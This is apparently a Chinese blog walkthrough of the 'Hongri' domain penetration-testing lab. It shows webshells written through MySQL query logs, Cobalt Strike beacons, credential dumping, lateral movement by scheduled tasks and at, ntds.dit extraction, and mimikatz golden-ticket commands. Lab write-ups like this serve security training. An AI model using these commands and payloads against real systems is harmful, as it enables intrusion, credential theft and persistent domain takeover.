红日靶场1
- 渗透测试过程
- 外网打点
- 突破边界
- 内网横向
- 权限维持
- 最后
渗透测试过程
本文章只说明渗透测试思路和技巧,对域靶场搭建不进行赘述
web-ip外网设置为 192.168.119.130,kali和外网ip同网段
外网打点
kali扫描目标ip
- nmap扫描目标网段
nmap -Pn -sV 192.168.119.0/24
发现80端口和3306mysql服务器端口 - dirsearch扫描目标
发现phpmyadmin - 访问phpmyadmin后通过root,root弱口令登录到phpadmin
突破边界
- 提权测试
-
mysql文件写入-该值为空无文件写入利用条件
-
数据库全局日志写入
开启全局日志 set global general_log = "ON"; 设置全局日志存放位置 set global general_log_file='C:/phpStudy/WWW/general.php'; 执行查询 select '<?php eval($_POST["pwd"]);?>
-
数据库慢查询日志写入
开启慢日志 set global slow_query_log=on; 设置日志写入路径 set global slow_query_log_file='C:/phpStudy/WWW/slow.php'; 执行查询 select '<?php @eval($_POST[shell]);?>' or sleep(10); 关闭慢日志 set global slow_query_log=off;
-
-
上线cs
查看webshell账户权限
上线cs
上线权限为system,故不涉及提权
内网横向
- 被控主机信息收集
确定存在域,域名为god.org
确认win7,直接尝试抓取明文密码
拿到administrator密码为hognrisec@2022 - 网段信息收集
cs上传fscan
最新版fscan上传之后执行扫描报错
尝试旧版fscan-成功
fscan64.exe -h 192.168.52.0/24 -o resu.txt
运行结束后取回结果
-
横向
目前掌握信息 内网fscan扫描结果 结果中存在域控主机为server2008,另有一台是server2003,且存在ftp服务 域信息 域控主机名为owa,IP为192.168.52.138 administrator用户明文密码
向域控横向-计划任务
设置转发上线监听
使用转发监听器生成shell beacon.exe
ipc连接
将beacon.exe上传到web边界服务器后通过copy命令将beacon传输到域控
通过计划任务上线
上线成功-同时返回的权限也是system权限
向server2003横向
因为是2003所以采用at命令横向
但是执行后并没有上线,感觉可能是马的问题,故重新生成非x64的木马测试
上线成功
至此已经完成横向移动的目的且权限均为system
权限维持
- 卷影拷贝导出ntds.dit
导出密码文件
reg save hklm\sam sam.hive
reg save hklm\system system.hive
下载如下文件
本地解析
拿到域中所有用户的hash
- 计划任务留后门
因为之前横向移动的时候使用的就是计划任务,所以在触发条件为onstart就会进行权限维持
-
黄金票据
前置信息
1.需要伪造的管理员用户名:administrator
2.完整的域名:god.org
3.域sid-域控执行
域id为:S-1-5-21-2952760202-1353902439-2381784089
4.kribtgt的ntlm hash或aes-256值
构造金票据 mimikatz kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:admin.kiribi 清空票据 mimikatz kerberos::purge 使用票据 mimikatz kerberos::ptt admin.kiribi 注入内存 mimikatz kerberos::tgt
配合psexec上线
shell psexec.exe \owa -s c:\beacon.exe最后
至此整个靶场基本通关了,当然了通关的方式有很多种每个人的思路都是不同的,本篇文章也是我的第一篇域渗透文章,后面会不断更新更多的域渗透靶场的渗透测试文章,也欢迎各位大佬在看过文章之后进行斧正
